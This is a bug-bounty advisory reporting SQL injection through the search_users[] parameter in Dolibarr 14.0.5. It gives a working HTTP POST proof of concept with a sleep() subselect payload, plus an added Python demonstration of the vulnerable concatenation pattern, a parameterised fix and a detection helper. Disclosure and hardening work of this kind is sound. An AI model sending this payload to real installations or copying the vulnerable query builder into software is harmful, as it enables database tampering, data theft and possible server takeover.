huntr / Laladee / F1D1CE3E-CA92-4C7B-B1B8-934E28EAA486
History: Jan 09, 2022 - 4:52 p.m.

SQL Injection in dolibarr/dolibarr

2022-01-09 16:52:45
laladee
www.huntr.dev
9
sql injection
dolibarr
search_users
sanitization
deletion
admin rights
remote code execute
bug bounty

EPSS

0.002

Percentile

62.2%

Description

The search_users parameter is not sanitised or escaped before it is used in a SQL statement, which could lead to SQL injection.

Proof of Concept

Slow query example:

POST /dolibarr-14.0.5/htdocs/compta/sociales/list.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://dolibarr.host.com/dolibarr-14.0.5/htdocs/
Cookie: DOLSESSID_fccaaf42bd9fa1c7b06bdc9c436940dd=mo7pn9rar97v28ol5a34qe0oa0; 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 478
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: dolibarr.host.com
Connection: Keep-alive

action=list&button_search_x=x&contextpage=sclist&formfilteraction=list&limit=1&pageplusoneold=1&search_amount=the&search_label=the&search_month_lim=7&search_project_ref=the&search_ref=&search_status=the&search_users[]=(select(0)from(select(sleep(0)))a)&search_year_lim=2027&selectedfields=cs.rowid%2Ccs.libelle%2Ccs.fk_type%2Ccs.date_ech%2Ccs.periode%2Cp.ref%2Ccs.fk_user%2Ccs.amount%2Ccs.paye%2C&sortfield=cs.date_ech&sortorder=DESC&token=7911ea6a297ad0d6edb116a22fe7e35ee7e35e
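Added example (not part of the huntr report and not Dolibarr's own code; Dolibarr is written in PHP, and the pattern below is reproduced in Python so it can be run stand-alone): the POST body from the proof of concept above is parsed, the search_users[] values are checked, and the filter clause is built two ways. The vulnerable builder splices the raw values into the IN (...) list, which is how a subselect such as the sleep() payload becomes part of the query. The hardened builder accepts only integer ids and passes them as bound parameters, rejecting the request otherwise. The flag_request helper is the same integer check applied as a detection rule for log review. The table name and rows are constructed for the demonstration; only the cs.fk_user column name comes from the request on the page.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample: the relevant part of the proof-of-concept POST body
# above, with the sleep() subselect in search_users[].
POC_BODY = (
    "action=list&contextpage=sclist&limit=1"
    "&search_users[]=(select(0)from(select(sleep(0)))a)"
    "&sortfield=cs.date_ech&sortorder=DESC"
)

# Constructed benign request for comparison: two integer user ids.
BENIGN_BODY = "action=list&search_users[]=3&search_users[]=17&sortfield=cs.date_ech"

# An integer id, optionally negative, and nothing else.
INT_RE = re.compile(r"^-?\d+$")


def search_users_from_body(body: str) -> list[str]:
    """Return the raw search_users[] values of a form-encoded POST body."""
    return parse_qs(body, keep_blank_values=True).get("search_users[]", [])


def build_filter_vulnerable(search_users: list[str]) -> str:
    """Vulnerable pattern: raw values are concatenated into the IN (...) list,
    so any value that is not a number is executed as SQL."""
    return " AND cs.fk_user IN (" + ",".join(search_users) + ")"


def build_filter_hardened(search_users: list[str]) -> tuple[str, list[int]]:
    """Hardened pattern: every value must be an integer id, and the ids are
    bound as parameters instead of being spliced into the SQL text.
    Raises ValueError on any other input so the request is rejected."""
    ids = []
    for raw in search_users:
        if not INT_RE.fullmatch(raw.strip()):
            raise ValueError(f"search_users[] value is not an integer id: {raw!r}")
        ids.append(int(raw))
    if not ids:
        return "", []
    placeholders = ",".join("?" for _ in ids)
    return f" AND cs.fk_user IN ({placeholders})", ids


def flag_request(body: str) -> list[str]:
    """Detection helper for log review or a WAF rule: the search_users[]
    values that are not integer ids (empty list means nothing suspicious)."""
    return [v for v in search_users_from_body(body) if not INT_RE.fullmatch(v.strip())]


def run_hardened_query(body: str) -> list[int]:
    """Execute the hardened filter against a constructed in-memory table
    (the table is a stand-in, not Dolibarr's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE social_charges_demo (rowid INTEGER, fk_user INTEGER)")
    conn.executemany("INSERT INTO social_charges_demo VALUES (?, ?)",
                     [(1, 3), (2, 17), (3, 42)])
    where, params = build_filter_hardened(search_users_from_body(body))
    sql = "SELECT cs.rowid FROM social_charges_demo AS cs WHERE 1=1" + where
    return [row[0] for row in conn.execute(sql, params)]


if __name__ == "__main__":
    print("flagged values:", flag_request(POC_BODY))
    print("vulnerable SQL:", build_filter_vulnerable(search_users_from_body(POC_BODY)))
    print("hardened result:", run_hardened_query(BENIGN_BODY))
    try:
        run_hardened_query(POC_BODY)
    except ValueError as err:
        print("hardened rejected:", err)
```

Casting each element to an integer before it reaches the query is the same effect Dolibarr's GETPOST int filtering gives for scalar parameters; the point of the example is that array-valued parameters need the same per-element treatment, and that binding the values keeps the query text fixed even if the check is later loosened.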

Impact

A successful attack may result in the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to the database, writing files to the server (leading to remote code execution), or writing scripts to extract data.

